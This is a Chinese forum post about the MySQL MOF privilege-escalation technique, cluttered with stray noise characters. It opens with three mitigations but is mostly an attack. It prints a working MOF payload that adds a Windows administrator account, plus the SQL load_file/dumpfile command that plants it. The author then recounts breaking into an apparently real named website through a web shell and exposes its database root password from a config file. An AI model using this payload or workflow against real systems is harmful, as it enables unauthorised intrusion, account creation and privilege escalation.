Mysql mof扩展漏洞防范方法* M6 r1 ]/ N1 ?$ t+ S( [; U3 Y
. q' t$ F4 |8 N网上公开的一些利用代码:
/ J3 L. o+ J2 B8 H
# b2 |, |, Y R; s$ X- t# k#pragma namespace(“\\\\.\\root\\subscription”)
- w: |* Z6 x m5 T7 [* D% G+ p- y' Z( D5 d* L3 D7 F
instance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user admin admin /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };
2 Y6 W2 R- l( r( w% e' j5 h. N# K2 f( e2 d- f' }$ w, F
6 @6 ^* ?1 M, k: f& k5 P8 M: I2 s, b! X' y9 s v; @$ K
- Y/ Q7 Z! p( S5 E, j% r- I0 }4 V5 d
连接mysql数据库后执行: select load_file(‘C:\\RECYCLER\\nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;: \ P7 I$ |1 m H; c
从上面代码来看得出解决办法:
) a |5 n: i% Y4 ]$ e, b
( e; k4 I7 m! S. ~; G# U1、mysql用户权限控制,禁止 “load_file”、”dumpfile”等函数. y9 E+ H2 |) X
/ s D( U, A) w: x, q H# z2、禁止使用”WScript.Shel”组件& ]; r: g0 ^; R4 R& C% |$ _) T7 n. p
. H" V% w, ] g$ } s5 @3 @. c# W
3、目录权限c:/windows/system32/wbem/mof/ 删除内置特殊组CREATOR OWNER
6 f$ h, {, W- k% O, P# V! I# q0 E! s" a! O9 ~. Z3 x. y s
当然上面是网上说的 感觉需要的权限很大 比如 root 还有mysql外链昨天碰到了就给大家演示下/ o) `& f! G* T$ L* a$ L
/ O1 M9 j& ], \" X* H) S事情是这样发生的 一机油在论坛提问我就看了下 发现已经有大牛搞下了 说是用是 mysql mof扩展提权+ W/ {( }* }, D
5 Z5 Z, s, V# |但是小菜发现没有听过于是赶紧去查资料学习…就有了上面的来着网上的内容! s2 k3 w2 c `
( y( k( d2 T/ D$ q+ U看懂了后就开始练手吧& ?9 u' f; T1 J. d; X$ \6 _, F
3 A/ t0 ^$ @% L8 T" _http://www.webbmw.com/config/config_ucenter.php 一句话 a
1 k6 ?2 A: L- V" a) ^8 z7 S" n/ U- H/ l. }; G
$_config['db']['1']['dbhost'] = ‘localhost’; $_config['db']['1']['dbuser'] = ‘root’; $_config['db']['1']['dbpw'] = ‘tfr226206′; $_config['db']['1']['dbcharset'] = ‘gbk’; $_config['db']['1']['pconnect'] = ’0′; $_config['db']['1']['dbname'] = ‘webbmw’; $_config['db']['1']['tablepre'] = ‘pre_’; $_config['db']['common']['slave_except_table'] = ”; 有root密码啊。
, t' ]% P3 n7 }# g6 m$ g) ?/ g; a6 ]" ^, F( i9 M% V
于是直接用菜刀开搞
" y( k N3 j2 I/ f2 Q2 X& k: |+ R5 u. `' J& r
上马先
; k1 X; P7 W; Q8 _0 M" m; A. T% }3 ]9 d
既然有了那些账号 之类的 于是我们就执行吧…….
& P! G! @, `( \' r1 }) l& I6 x! ^3 S( U7 B" {- R
小小的说下* Z7 \( v9 j6 P# |3 {/ p1 J
8 D; J2 Q1 U2 [- P# u; |" h5 d在这里第1次执行未成功 原因未知
/ L& q. V ?& U/ _8 }$ R
! K6 f x4 P4 q: s我就猜想是否是因为我们执行的代码有问题 于是我就去我wooyun找的代码。3 E- V' |6 z) j: J* ^& G% ^
% B+ A* y# F& s5 K- W#pragma namespace(“\\\\.\\root\\subscription”)
: m0 x/ U4 i7 j% {- j3 b4 M- @7 p/ }' p# M) S5 |& z+ r
instance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user test test /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };) l+ a0 k6 i! J% \+ T
$ c0 |, e7 Q1 H0 I$ z
我是将文件放到C:\WINDOWS\temp\1.mof, E7 H2 t& [/ p1 Y6 g
d* t' V) ^/ B/ c/ c3 t5 l所以我们就改下执行的代码" m# ]+ S- s4 [* `) N
( ^& k( L/ @$ y7 f% E) [, U* \
select load_file(‘C:\WINDOWS\temp\1.mof‘) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;
V; o2 q s* P2 M1 c% H/ |
" c2 [4 U0 ~: j( j9 k
6 ~5 p2 l$ X& Y/ z/ S: |0 [& |$ p/ [+ ~4 X" G6 k! m- { i1 ^% Z6 z \1 x
但是 你会发现账号还是没有躺在那里。。% [/ O4 S: ?( K+ o
; j7 J+ G! ?8 C) y' _6 K
于是我就感觉蛋疼1 y: y! m% O# y9 e/ t: Z5 z
4 X4 X; [9 d$ ~0 P0 v+ W
就去一个一个去执行 但是执行到第2个 mysql时就成功了………0 j2 k z9 s: R" `
) m. M5 P! b( ]
- T* U% R, S( v( a; g# O
$ i$ ?8 K7 F$ ~: ~. r- \4 z但是其他库均不成功…: b+ I& h" |4 t! x* C- T6 y: v
3 R2 i: b& @& T9 w8 \我就很费解呀 到底为什么不成功求大牛解答…
/ ]3 x/ r5 P8 T+ K- g
+ ~1 e( W- J) T6 p! B1 d
' z' n( M8 o' V4 G
2 U+ a* n' X; B2 |. C- m% o |